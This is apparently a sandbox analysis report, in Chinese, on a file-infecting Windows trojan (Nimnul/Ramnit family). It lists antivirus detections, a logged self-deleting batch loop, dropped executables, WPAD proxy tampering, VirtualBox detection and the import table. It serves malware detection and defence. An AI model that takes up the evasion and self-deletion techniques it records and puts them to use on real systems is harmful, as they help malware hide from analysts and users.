6.4
高危
58 个模型检测该样本为恶意!
重新分析
更多

e11ef3018a3163e4f03ec0a5ec6f300817c5f44cc6ecf86dc2d0aeb4a7327835

3b6482c199b9581ad3d0da6df9edff66.exe

分析耗时

80s

最近分析

文件大小

10.3MB
静态报毒 动态报毒 A + W32 AI SCORE=85 BANLOAD CLASSIC CONFIDENCE CSTQAJ DARKSHELL DUMPMODULEINFECTIOUSNME FAMVT FILEINFECTOR HIGH CONFIDENCE JADTRE KA@558NXG KUDJ LOADER M1R5 MALICIOUS PE MIKCER NIMNUL OTWYCAL PATCHLOAD PCARRIER RAMNIT ROUE SMALL STATIC AI UNSAFE VJADTRE WALI WAPOMI 更多
鹰眼引擎
未检测 暂无鹰眼引擎检测结果
静态判定
反病毒引擎
查杀引擎 查杀结果 查杀时间 查杀版本
Alibaba Virus:Win32/Nimnul.356d27b6 20190527 0.3.0.5
Baidu Win32.Virus.Otwycal.d 20190318 1.0.0.2
Avast Other:Malware-gen [Trj] 20201210 21.1.5827.0
Tencent Virus.Win32.Loader.aab 20201211 1.0.0.1
Kingsoft 20201211 2017.9.26.565
McAfee W32/Kudj 20201211 6.0.6.653
CrowdStrike win/malicious_confidence_60% (W) 20190702 1.0
静态指标
Command line console output was observed (50 out of 502 个事件)
Time & API Arguments Status Return Repeated
1619360291.231999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.247999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619360291.262999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.294999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe
console_handle: 0x00000007
success 1 0
1619360291.294999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619360291.309999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.309999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619360291.309999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.309999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619360291.325999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619360291.341999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.341999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619360291.341999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.356999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe
console_handle: 0x00000007
success 1 0
1619360291.356999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619360291.372999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.372999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619360291.387999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.387999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619360291.387999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619360291.403999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.403999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619360291.403999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.450999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe
console_handle: 0x00000007
success 1 0
1619360291.466999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619360291.466999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.481999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619360291.481999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.481999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619360291.481999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619360291.497999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.497999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619360291.497999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.512999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe
console_handle: 0x00000007
success 1 0
1619360291.512999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619360291.528999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.544999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619360291.544999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.544999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619360291.559999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
1619360291.575999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.575999
WriteConsoleW
buffer: del
console_handle: 0x00000007
success 1 0
1619360291.575999
WriteConsoleW
buffer: "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.637999
WriteConsoleW
buffer: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe
console_handle: 0x00000007
success 1 0
1619360291.637999
WriteConsoleW
buffer: 拒绝访问。
console_handle: 0x0000000b
success 1 0
1619360291.653999
WriteConsoleW
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp>
console_handle: 0x00000007
success 1 0
1619360291.669999
WriteConsoleW
buffer: if
console_handle: 0x00000007
success 1 0
1619360291.684999
WriteConsoleW
buffer: exist "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\KpKRa.exe"
console_handle: 0x00000007
success 1 0
1619360291.684999
WriteConsoleW
buffer: goto
console_handle: 0x00000007
success 1 0
1619360291.684999
WriteConsoleW
buffer: :DELFILE
console_handle: 0x00000007
success 1 0
This executable has a PDB path (1 个事件)
pdb_path C:\Jenkins\jobs\miktex-2.9\workspace\build-x86\binlib\update_mfc.pdb
Tries to locate where the browsers are installed (1 个事件)
file C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
The executable contains unknown PE section names indicative of a packer (could be a false positive) (4 个事件)
section .gfids
section .giats
section .00cfg
section \x90;?\xdd\xa3u\x9f
The file contains an unknown PE resource name possibly indicative of a packer (1 个事件)
resource name AVI
行为判定
动态指标
Creates executable files on the filesystem (20 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\11502C29.exe
file C:\Python27\Lib\distutils\command\wininst-6.0.exe
file C:\Python27\Lib\site-packages\setuptools\cli-32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\07231522.bat
file C:\Python27\Lib\site-packages\setuptools\cli.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\3FBA68D2.exe
file C:\tmpsij43m\bin\inject-x86.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\09692C9B.exe
file C:\Python27\Lib\site-packages\setuptools\gui-32.exe
file C:\Python27\Lib\distutils\command\wininst-8.0.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\w32.exe
file C:\Python27\Lib\site-packages\pip\_vendor\distlib\t32.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\05A86F06.exe
file C:\Python27\Lib\distutils\command\wininst-9.0.exe
file C:\tmpsij43m\bin\is32bit.exe
file C:\Python27\Lib\site-packages\setuptools\gui.exe
file C:\tmpsij43m\bin\execsc.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\73E925BC.exe
file C:\Python27\Lib\distutils\command\wininst-7.1.exe
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\KpKRa.exe
Drops a binary and executes it (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\07231522.bat
Drops an executable to the user AppData folder (1 个事件)
file C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\KpKRa.exe
A process created a hidden window (1 个事件)
Time & API Arguments Status Return Repeated
1619360290.778999
ShellExecuteExW
parameters:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\07231522.bat
filepath_r: C:\Users\ADMINI~1.OSK\AppData\Local\Temp\07231522.bat
show_type: 0
success 1 0
Checks adapter addresses which can be used to detect virtual network interfaces (1 个事件)
Time & API Arguments Status Return Repeated
1619360271.747999
GetAdaptersAddresses
flags: 0
family: 0
failed 111 0
The binary likely contains encrypted or compressed data indicative of a packer (1 个事件)
entropy 6.934223651009754 section {'size_of_data': '0x00004200', 'virtual_address': '0x00a5c000', 'entropy': 6.934223651009754, 'name': '\\x90;?\\xdd\\xa3u\\x9f', 'virtual_size': '0x00005000'} description A section with a high entropy has been found
网络通信
Communicates with host for which no DNS query was performed (1 个事件)
host 172.217.24.14
Sets or modifies WPAD proxy autoconfiguration file for traffic interception (15 个事件)
Time & API Arguments Status Return Repeated
1619360274.325999
RegSetValueExA
key_handle: 0x000003ec
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619360274.325999
RegSetValueExA
key_handle: 0x000003ec
value: `Ê%*æ9×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619360274.325999
RegSetValueExA
key_handle: 0x000003ec
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619360274.325999
RegSetValueExW
key_handle: 0x000003ec
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619360274.325999
RegSetValueExA
key_handle: 0x000003e8
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619360274.325999
RegSetValueExA
key_handle: 0x000003e8
value: `Ê%*æ9×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619360274.325999
RegSetValueExA
key_handle: 0x000003e8
value: 3
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
1619360274.356999
RegSetValueExW
key_handle: 0x000002f8
value: {40112ABE-63B3-43C3-BE93-1440EE3AF106}
regkey_r: WpadLastNetwork
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\WpadLastNetwork
success 0 0
1619360279.231999
RegSetValueExA
key_handle: 0x00000408
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionReason
success 0 0
1619360279.231999
RegSetValueExA
key_handle: 0x00000408
value: Ô-æ9×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecisionTime
success 0 0
1619360279.231999
RegSetValueExA
key_handle: 0x00000408
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadDecision
success 0 0
1619360279.231999
RegSetValueExW
key_handle: 0x00000408
value: 网络 2
regkey_r: WpadNetworkName
reg_type: 1 (REG_SZ)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{40112ABE-63B3-43C3-BE93-1440EE3AF106}\WpadNetworkName
success 0 0
1619360279.231999
RegSetValueExA
key_handle: 0x0000040c
value: 1
regkey_r: WpadDecisionReason
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionReason
success 0 0
1619360279.231999
RegSetValueExA
key_handle: 0x0000040c
value: Ô-æ9×
regkey_r: WpadDecisionTime
reg_type: 3 (REG_BINARY)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecisionTime
success 0 0
1619360279.231999
RegSetValueExA
key_handle: 0x0000040c
value: 0
regkey_r: WpadDecision
reg_type: 4 (REG_DWORD)
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\0a-00-27-00-00-00\WpadDecision
success 0 0
Detects VirtualBox through the presence of a file (5 个事件)
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxControl.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxTray.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxDrvInst.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\VBoxWHQLFake.exe
file C:\Program Files\Oracle\VirtualBox Guest Additions\uninst.exe
File has been identified by 58 AntiVirus engines on VirusTotal as malicious (50 out of 58 个事件)
Bkav W32.FamVT.DumpModuleInfectiousNME.PE
Elastic malicious (high confidence)
MicroWorld-eScan Win32.VJadtre.3
FireEye Generic.mg.3b6482c199b9581a
ALYac Win32.VJadtre.3
Cylance Unsafe
Zillya Virus.Nimnul.Win32.5
AegisLab Virus.Win32.Nimnul.m1R5
K7AntiVirus Virus ( 0040f7441 )
Alibaba Virus:Win32/Nimnul.356d27b6
K7GW Virus ( 0040f7441 )
Arcabit Win32.VJadtre.3
BitDefenderTheta AI:FileInfector.991137D00F
Cyren W32/PatchLoad.E
Symantec W32.Wapomi.C!inf
TotalDefense Win32/Nimnul.A
Baidu Win32.Virus.Otwycal.d
TrendMicro-HouseCall PE_WAPOMI.BM
Paloalto generic.ml
Kaspersky Virus.Win32.Nimnul.f
BitDefender Win32.VJadtre.3
NANO-Antivirus Trojan.Win32.Banload.cstqaj
Avast Other:Malware-gen [Trj]
Tencent Virus.Win32.Loader.aab
Ad-Aware Win32.VJadtre.3
Sophos ML/PE-A + W32/Nimnul-A
Comodo Virus.Win32.Wali.KA@558nxg
F-Secure Malware.W32/Jadtre.B
DrWeb BackDoor.Darkshell.246
VIPRE Virus.Win32.Small.acea (v)
TrendMicro PE_WAPOMI.BM
McAfee-GW-Edition BehavesLike.Win32.Kudj.vm
SentinelOne Static AI - Malicious PE
Emsisoft Win32.VJadtre.3 (B)
APEX Malicious
Jiangmin Win32/Nimnul.f
MaxSecure Virus.Nimnul.F
Avira W32/Jadtre.B
MAX malware (ai score=85)
Antiy-AVL Virus/Win32.Nimnul.f
Gridinsoft Trojan.Heur!.03042201
Microsoft Virus:Win32/Mikcer.B
ViRobot Win32.Ramnit.F
ZoneAlarm Virus.Win32.Nimnul.f
GData Win32.Virus.Wapomi.A
AhnLab-V3 Win32/VJadtre.Gen
McAfee W32/Kudj
TACHYON Virus/W32.Ramnit.C
VBA32 Virus.Nimnul.19209
Zoner Virus.Win32.23755
可视化分析
二进制图像
暂无二进制图像 该样本未生成二进制可视化图像
运行截图
暂无运行截图 该样本运行过程中未生成截图

👋 欢迎使用 ChatHawk

我是您的恶意软件分析助手,可以帮您分析和解读恶意软件报告。请随时向我提问!

🔍 主要威胁分析
⚡ 行为特征
🛡️ 防护建议
🔧 技术手段
🎯 检测方法
🤖

PE Compile Time

2016-08-09 03:27:57

Imports

Library WININET.dll:
0xd84208 InternetCrackUrlW
Library WS2_32.dll:
0xd8431c recv
0xd84320 ntohs
0xd84324 ntohl
0xd84328 listen
0xd8432c inet_addr
0xd84330 htons
0xd84334 recvfrom
0xd84338 getsockopt
0xd8433c ioctlsocket
0xd84340 send
0xd84344 sendto
0xd84348 setsockopt
0xd8434c shutdown
0xd84350 socket
0xd84354 freeaddrinfo
0xd84358 getaddrinfo
0xd8435c getservbyname
0xd84360 getsockname
0xd84364 getpeername
0xd84368 gethostbyname
0xd8436c WSAStartup
0xd84370 WSACleanup
0xd84374 WSAGetLastError
0xd84378 getnameinfo
0xd84380 WSARecv
0xd84384 WSASend
0xd84388 gethostname
0xd8438c WSASetLastError
0xd84390 select
0xd84394 WSAIoctl
0xd84398 connect
0xd8439c closesocket
0xd843a0 bind
0xd843a4 accept
0xd843a8 htonl
0xd843ac __WSAFDIsSet
Library MSWSOCK.dll:
0xd83a20 TransmitFile
Library RPCRT4.dll:
0xd83bc4 UuidCreate
Library ODBC32.dll:
0xd83a50
0xd83a54
0xd83a58
0xd83a5c
0xd83a60
0xd83a64
0xd83a68
Library SHFOLDER.dll:
0xd83c60 SHGetFolderPathW
Library SHLWAPI.dll:
0xd83c90 SHDeleteKeyW
0xd83c94 PathRelativePathToW
0xd83c98 PathCanonicalizeA
0xd83c9c AssocQueryKeyW
0xd83ca0 PathFindFileNameW
0xd83ca8 PathIsUNCW
0xd83cac PathStripToRootW
0xd83cb0 StrFormatKBSizeW
0xd83cb4 PathFindExtensionW
0xd83cb8 PathRemoveFileSpecW
Library KERNEL32.dll:
0xd83468 Module32First
0xd8346c Module32Next
0xd83474 GetConsoleOutputCP
0xd83478 SleepEx
0xd8347c VerSetConditionMask
0xd83480 GetModuleHandleA
0xd83484 GetSystemDirectoryA
0xd83488 VerifyVersionInfoA
0xd8348c Heap32Next
0xd83490 Heap32First
0xd83494 Heap32ListNext
0xd83498 Heap32ListFirst
0xd8349c GetTickCount
0xd834a0 GetSystemInfo
0xd834a4 GlobalMemoryStatus
0xd834ac VirtualUnlock
0xd834b0 VirtualLock
0xd834b4 CreateNamedPipeA
0xd834b8 UnlockFileEx
0xd834bc LockFileEx
0xd834c0 UnlockFile
0xd834c4 SetEndOfFile
0xd834c8 GetVersionExA
0xd834cc CreateFileA
0xd834d0 GetModuleFileNameA
0xd834d4 LoadLibraryA
0xd834d8 TerminateProcess
0xd834dc CreateSemaphoreA
0xd834e0 ReleaseSemaphore
0xd834e4 SwitchToThread
0xd83504 GetDriveTypeA
0xd83508 PeekNamedPipe
0xd8350c FlushFileBuffers
0xd83510 ReadFile
0xd83514 WriteFile
0xd83518 CancelIo
0xd8351c SetFilePointer
0xd83520 DeviceIoControl
0xd83524 SetStdHandle
0xd83528 GetOverlappedResult
0xd83530 GetFileTime
0xd83534 GetFileType
0xd8353c CreateEventA
0xd83540 ReleaseMutex
0xd83544 SetEvent
0xd83550 TlsSetValue
0xd83554 TlsGetValue
0xd8356c GetCommandLineW
0xd83570 TlsFree
0xd83574 TlsAlloc
0xd83580 GlobalFree
0xd83584 Thread32Next
0xd83594 OutputDebugStringW
0xd83598 InterlockedExchange
0xd8359c OpenFileMappingW
0xd835a0 CreateFileMappingW
0xd835a4 UnmapViewOfFile
0xd835a8 FlushViewOfFile
0xd835ac MapViewOfFile
0xd835b0 LoadLibraryW
0xd835b4 FreeLibrary
0xd835b8 Process32NextW
0xd835bc Process32FirstW
0xd835c4 SearchPathW
0xd835c8 CreateProcessW
0xd835cc CreatePipe
0xd835d0 GetStdHandle
0xd835d4 WaitForSingleObject
0xd835d8 GetCurrentThreadId
0xd835dc GetExitCodeProcess
0xd835e0 GetCurrentProcessId
0xd835e4 OpenProcess
0xd835ec GetVersion
0xd835f0 CreateDirectoryW
0xd835f4 GetDriveTypeW
0xd835f8 FormatMessageW
0xd835fc FormatMessageA
0xd83600 LocalFree
0xd83604 LocalAlloc
0xd83608 GetVolumePathNameA
0xd8360c GetVersionExW
0xd83610 GetFullPathNameW
0xd83614 GetModuleHandleW
0xd83618 GetNativeSystemInfo
0xd8361c SetLastError
0xd83620 GetProcAddress
0xd83624 CreateHardLinkW
0xd83628 CopyFileW
0xd8362c FindFirstFileW
0xd83630 DeleteFileW
0xd83634 SetFileAttributesW
0xd83638 SetFileTime
0xd8363c GetFileSize
0xd83640 FindNextFileW
0xd83644 FindFirstFileExW
0xd83648 FindClose
0xd8364c GetFileAttributesW
0xd83650 RemoveDirectoryW
0xd83654 GetLongPathNameW
0xd83658 MoveFileExW
0xd8365c CreateFileW
0xd83664 Sleep
0xd83668 GetCurrentThread
0xd8366c GetVolumePathNameW
0xd83670 GetTempFileNameW
0xd83674 GetTempPathW
0xd83678 DebugBreak
0xd8367c GetModuleFileNameW
0xd83680 DuplicateHandle
0xd83684 CloseHandle
0xd83690 ResumeThread
0xd83694 GetCurrentProcess
0xd83698 WideCharToMultiByte
0xd836a0 FindResourceW
0xd836a4 GetLogicalDrives
0xd836a8 SizeofResource
0xd836ac Thread32First
0xd836b0 Process32Next
0xd836b8 Process32First
0xd836bc LoadResource
0xd836c0 SetErrorMode
0xd836c4 LockResource
0xd836c8 MultiByteToWideChar
0xd836d4 GetLastError
0xd836d8 RaiseException
0xd836dc GetProcessHeap
0xd836e0 HeapSize
0xd836e4 HeapFree
0xd836e8 HeapReAlloc
0xd836ec HeapAlloc
0xd836f0 HeapDestroy
0xd836f4 DecodePointer
0xd836f8 LockFile
0xd83700 UnregisterWaitEx
0xd83704 QueryDepthSList
0xd83710 VirtualFree
0xd83714 GetThreadTimes
0xd83718 UnregisterWait
0xd8373c GetThreadPriority
0xd83740 SignalObjectAndWait
0xd83744 CreateTimerQueue
0xd8374c FindNextFileA
0xd83750 FindFirstFileExA
0xd83754 GlobalAlloc
0xd83758 GlobalSize
0xd8375c GlobalLock
0xd83760 GlobalUnlock
0xd83764 MulDiv
0xd83768 OutputDebugStringA
0xd8376c EncodePointer
0xd83770 GetSystemDirectoryW
0xd83774 FreeResource
0xd83778 LoadLibraryExW
0xd8377c GlobalDeleteAtom
0xd83780 lstrcmpW
0xd83784 GlobalAddAtomW
0xd83788 GlobalFindAtomW
0xd8378c VirtualProtect
0xd83790 CreateEventW
0xd83794 SetThreadPriority
0xd83798 SuspendThread
0xd8379c CreateMutexW
0xd837a0 CreateSemaphoreW
0xd837a4 lstrcmpA
0xd837a8 CompareStringA
0xd837b8 GlobalReAlloc
0xd837bc GlobalHandle
0xd837c0 LocalReAlloc
0xd837c4 GlobalGetAtomNameW
0xd837c8 GetAtomNameW
0xd837cc GetThreadLocale
0xd837d0 GlobalFlags
0xd837d4 lstrcpyW
0xd837d8 CompareStringW
0xd837dc GetLocaleInfoW
0xd837e8 FindResourceExW
0xd837ec GetShortPathNameW
0xd837f0 lstrcmpiW
0xd837f4 MoveFileW
0xd837f8 GetStringTypeExW
0xd837fc VerifyVersionInfoW
0xd83804 GetFileSizeEx
0xd8380c GetProfileIntW
0xd83810 GetDiskFreeSpaceW
0xd83814 ReplaceFileW
0xd83818 GetUserDefaultLCID
0xd8381c LocalLock
0xd83820 LocalUnlock
0xd83824 ResetEvent
0xd83838 InitializeSListHead
0xd8383c IsDebuggerPresent
0xd83840 GetStartupInfoW
0xd83844 GetStringTypeW
0xd83848 GetExitCodeThread
0xd83850 QueueUserWorkItem
0xd83858 LCMapStringW
0xd8385c GetCPInfo
0xd83860 RtlUnwind
0xd8386c ExitProcess
0xd83870 GetModuleHandleExW
0xd83874 GetFullPathNameA
0xd83884 HeapValidate
0xd83888 CreateProcessA
0xd8388c GetConsoleMode
0xd83890 ReadConsoleW
0xd83894 GetConsoleCP
0xd83898 CreateThread
0xd8389c ExitThread
0xd838a8 SetFilePointerEx
0xd838ac GetCommandLineA
0xd838b4 VirtualAlloc
0xd838b8 VirtualQuery
0xd838bc GetACP
0xd838c0 GetDateFormatW
0xd838c4 GetTimeFormatW
0xd838c8 IsValidLocale
0xd838cc EnumSystemLocalesW
0xd838d0 WriteConsoleW
0xd838d4 IsValidCodePage
0xd838d8 GetOEMCP
Library USER32.dll:
0xd83cf0 AdjustWindowRectEx
0xd83cf4 ScreenToClient
0xd83cf8 MapWindowPoints
0xd83cfc GetSysColor
0xd83d00 CopyRect
0xd83d04 EqualRect
0xd83d08 PtInRect
0xd83d0c SetWindowLongW
0xd83d10 GetClassLongW
0xd83d14 GetClassNameW
0xd83d18 GetTopWindow
0xd83d1c GetLastActivePopup
0xd83d20 SetWindowsHookExW
0xd83d24 UnhookWindowsHookEx
0xd83d28 CallNextHookEx
0xd83d2c SetScrollInfo
0xd83d30 GetScrollInfo
0xd83d34 WinHelpW
0xd83d38 MonitorFromWindow
0xd83d3c GetMonitorInfoW
0xd83d40 ShowWindow
0xd83d44 MoveWindow
0xd83d48 SetDlgItemInt
0xd83d4c GetDlgItemInt
0xd83d50 SetDlgItemTextW
0xd83d54 GetDlgItemTextW
0xd83d58 CheckDlgButton
0xd83d5c CheckRadioButton
0xd83d60 IsDlgButtonChecked
0xd83d64 SendDlgItemMessageW
0xd83d68 IsWindowEnabled
0xd83d6c ScrollWindowEx
0xd83d70 SetWindowTextW
0xd83d74 IsDialogMessageW
0xd83d7c EndDialog
0xd83d80 GetNextDlgTabItem
0xd83d84 GetActiveWindow
0xd83d88 GetDesktopWindow
0xd83d8c LoadMenuW
0xd83d94 GetAsyncKeyState
0xd83d98 MapDialogRect
0xd83d9c GetMessageW
0xd83da0 TranslateMessage
0xd83da8 GetKeyNameTextW
0xd83dac MapVirtualKeyW
0xd83db0 DrawTextW
0xd83db4 DrawTextExW
0xd83db8 GrayStringW
0xd83dbc TabbedTextOutW
0xd83dc0 GetWindowDC
0xd83dc4 ClientToScreen
0xd83dc8 FillRect
0xd83dcc PostQuitMessage
0xd83dd0 ShowOwnedPopups
0xd83dd4 SetCursor
0xd83dd8 GetSysColorBrush
0xd83ddc LoadCursorW
0xd83de4 TrackMouseEvent
0xd83de8 InvalidateRect
0xd83dec InflateRect
0xd83df0 DestroyIcon
0xd83df4 LoadImageW
0xd83df8 DestroyMenu
0xd83dfc GetMenuItemInfoW
0xd83e00 CopyImage
0xd83e04 GetDialogBaseUnits
0xd83e08 IntersectRect
0xd83e0c DeleteMenu
0xd83e10 SetTimer
0xd83e14 KillTimer
0xd83e18 CharUpperW
0xd83e1c GetNextDlgGroupItem
0xd83e20 SetCapture
0xd83e24 ReleaseCapture
0xd83e28 WindowFromPoint
0xd83e2c DrawFocusRect
0xd83e30 IsRectEmpty
0xd83e34 DrawIconEx
0xd83e38 GetIconInfo
0xd83e3c MessageBeep
0xd83e40 GetWindowRect
0xd83e44 HideCaret
0xd83e48 InvertRect
0xd83e4c NotifyWinEvent
0xd83e50 CreatePopupMenu
0xd83e54 GetMenuDefaultItem
0xd83e5c EnumDisplayMonitors
0xd83e60 SetClassLongW
0xd83e64 SetWindowRgn
0xd83e68 SetParent
0xd83e6c OpenClipboard
0xd83e70 CloseClipboard
0xd83e74 SetClipboardData
0xd83e78 EmptyClipboard
0xd83e7c DrawStateW
0xd83e80 DrawEdge
0xd83e84 DrawFrameControl
0xd83e88 IsZoomed
0xd83e8c GetSystemMenu
0xd83e90 BringWindowToTop
0xd83e94 SetCursorPos
0xd83e98 CopyIcon
0xd83e9c FrameRect
0xd83ea0 DrawIcon
0xd83ea4 UnionRect
0xd83ea8 UpdateLayeredWindow
0xd83eac MonitorFromPoint
0xd83eb0 LoadAcceleratorsW
0xd83eb8 InsertMenuItemW
0xd83ebc GetMenuBarInfo
0xd83ec0 UnpackDDElParam
0xd83ec4 ReuseDDElParam
0xd83ec8 GetComboBoxInfo
0xd83ecc PostThreadMessageW
0xd83ed0 WaitMessage
0xd83ed4 GetKeyboardLayout
0xd83ed8 IsCharLowerW
0xd83edc MapVirtualKeyExW
0xd83ee0 ToUnicodeEx
0xd83ee4 GetKeyboardState
0xd83ef4 SetRect
0xd83ef8 LockWindowUpdate
